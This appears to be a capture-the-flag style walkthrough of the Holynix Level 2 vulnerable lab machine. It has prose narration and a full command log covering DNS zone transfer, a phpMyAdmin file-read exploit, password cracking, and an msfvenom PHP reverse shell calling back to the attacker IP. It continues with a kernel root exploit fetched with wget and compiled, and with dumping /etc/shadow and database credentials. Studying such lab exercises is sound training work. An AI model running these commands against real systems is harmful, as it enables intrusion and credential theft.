As soon as the php backdoor file was opened, it connected back to the attacker giving them remote access to the system, which allowed the attacker to interact with the operating system. The attacker continued by listing all the files of each user's personal home folder. As the backdoor was executed by the web server, the backdoor inherited the same permissions, and, as the web server had to display each user folder the attacker can also do the same. There were various personal files to some users; however the attacker spotted an email, and upon reading it discovered that the user had their password reset to their name along with a few random characters. The attacker located the username the email was sent to, after looking up the user's details by using the same file as before (/etc/passwd), to discover their full name. It was also a user that had been discovered before, due to the user having permission to login remotely.
The attacker now connects to the target via "SSH" with the newly acquired details and as a result had a remote TTY shell. The attacker then checked the current kernel version, and discovered like phpMyAdmin, it was out-dated, and checks in the same manner to see if there is a public exploit for it. After locating a possible exploit, the attacker then copied it to their root web folder, checked that the file had permission to be accessed by "Apache", that there wasn't any comments at the start of the file and then started the web server, to make the file accessible to the target.
Going back to the target, the attacker navigates to a folder which they usually have write access as well as the ability to execute programs, /tmp. The attacker then downloads the exploit locally on the target and then compiles it. As soon as the newly created program had been executed the attacker became the super user, root. The attacker now has access to the complete system...
The attacker decided that they wished to harvest the system for credentials. As databases can contain valuable and sensitive information, the attacker opted to gain access. The attacker was running as root, which would allow them to reset the password to anything they wished. However, this would have caused the functionality to stop, so instead they located them (as they had to be stored somewhere allowing the web server to interact with the database). The attacker navigated to a common location for the web root folder to be, and then, by searching for all files with php extension that use a common function to connect to a MySQL database, the attacker found all the insistences of the command. The attacker was then able to view the complete file which contained the phrase, and discovered the credentials in plain text.
NotesCode:netdiscover ifconfig eth0 ifconfig eth0 192.168.1.192 ifconfig eth0 us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535 nmap -p 1-65535 -T4 -A -v 192.168.1.88 firefox 192.168.1.88 echo www.zincftp.com 192.168.1.88 >> /etc/hosts cat /etc/hosts echo nameserver 192.168.1.88 > /etc/resolv.conf cat /etc/resolv.conf dig zincftp.com @192.168.1.88 dig AXFR zincftp.com @192.168.1.88 ifconfig eth0 192.168.1.89 dig AXFR zincftp.com @192.168.1.88 dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq > /tmp/hosts dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq > /tmp/users dig AXFR zincftp.com @192.168.1.88 | grep -v 192.168.1.88 | grep -v ";" BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Fuzzers -> DirBuster # http://192.168.1.88 directory-list-2.3-medium.txt ifconfig eth0 192.168.1.34 BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Fuzzers -> DirBuster # http://192.168.1.88 directory-list-2.3-medium.txt Right Click -> Open In Broswer # /phpMyAdmin/ /setup_guide/ phpMyAdmin -> zincftp_data -> browse # shanover & lbaumann phpMyAdmin -> home -> changelog cd /pentest/exploits/exploitdb grep -i phpmyadmin files.csv perl platforms/php/webapps/1244.pl perl platforms/php/etc/passwd perl platforms/php/etc/passwd | grep /bin/bash | cut -d ":" -f1 perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd | grep /bin/bash | cut -d ":" -f1 > /tmp/sshUsers firefox http://192.168.1.88/setup_guide/ -> todo perl platforms/php/etc/pure-ftpd/pureftpd.passwd perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/ perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/ > /tmp/ftpUsers cd /pentest/passwords/john find / -name password.lst wc -l /pentest/passwords/wordlists/darkc0de.lst wc -l /opt/framework3/msf3/data/john/wordlists/password.lst # Much smaller, therefore quicker! ./john --wordlist=/opt/framework3/msf3/data/john/wordlists/password.lst /tmp/ftpUsers # --rules ftp 192.168.1.88 # dhammond jack-in-the-box ls cd web echo "<? echo \"Hello World\"; ?>" > test.php put test.php curl dhammond.zincftp.com/test.php msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 -f raw > evil.php msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 E put evil.php curl dhammond.zincftp.com/evil.php && exit sysinfo shell id python -c 'import pty; pty.spawn("/bin/sh")' ls -lAhR /home cat /home/amckinley/my_key.eml #first and last name, all lower case, followed by 2ba9 grep amckinley /etc/passwd # Agustin Mckinley exit quit ssh firstname.lastname@example.org # agustinmckinley2ba9 id uname -a exit exit exit cd /pentest/explotis/exploitdb grep -i "linux kernel 2.6" files.csv | grep -i root #| uniq # grep -i dos cp platforms/linux/local/5092.c /var/www/exploit.c /etc/init.d/apache2 start ls -l /var/www/exploit.c head -n 20 /var/www/exploit.c # Check to make sure vaild code cd /tmp ls -la wget 192.168.1.34/exploit.c gcc exploit.c -o root ls -la ./root id && ifconfig && uname -a && cat /etc/shadow && ls -lahR /root cd /var/www find ./ -name *.php -print0 | xargs -0 grep -i -n "mysql_connect" cat dev/dbconn.php cat htdocs/dbconn.php
- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
- The user names which were collected were not essential for this, however this was included to demonstrate the techniques.
- On reflection, DirBuster was only used to visible compare the HTTP codes, depending on the IP address used. This could of been achived manually as checking "/phpMyAdmin/" is highly recommend (along with "/robots.txt" for example). Then by using the phpMyAdmin exploit, viewing the file "/etc/apache2/sites-enabled/000-default" would have revealed "/setup_guides/".
- Some mistakes in the video are more obvious.
- This video has been "over-edited" more than most of the other videos as it was made to fix the length of music.
Song: B-Complex - Beautiful Lies VIP & Camo & Krooked - Climax
Video length: 11:16
Capture length: 59:11
Blog Post: g0tmi1k: [Video] Holynix - Level 2
Forum Post: http://www.backtrack-linux.org/forum...-videos/44124-[video]-holynix-level-2-a.html#post205351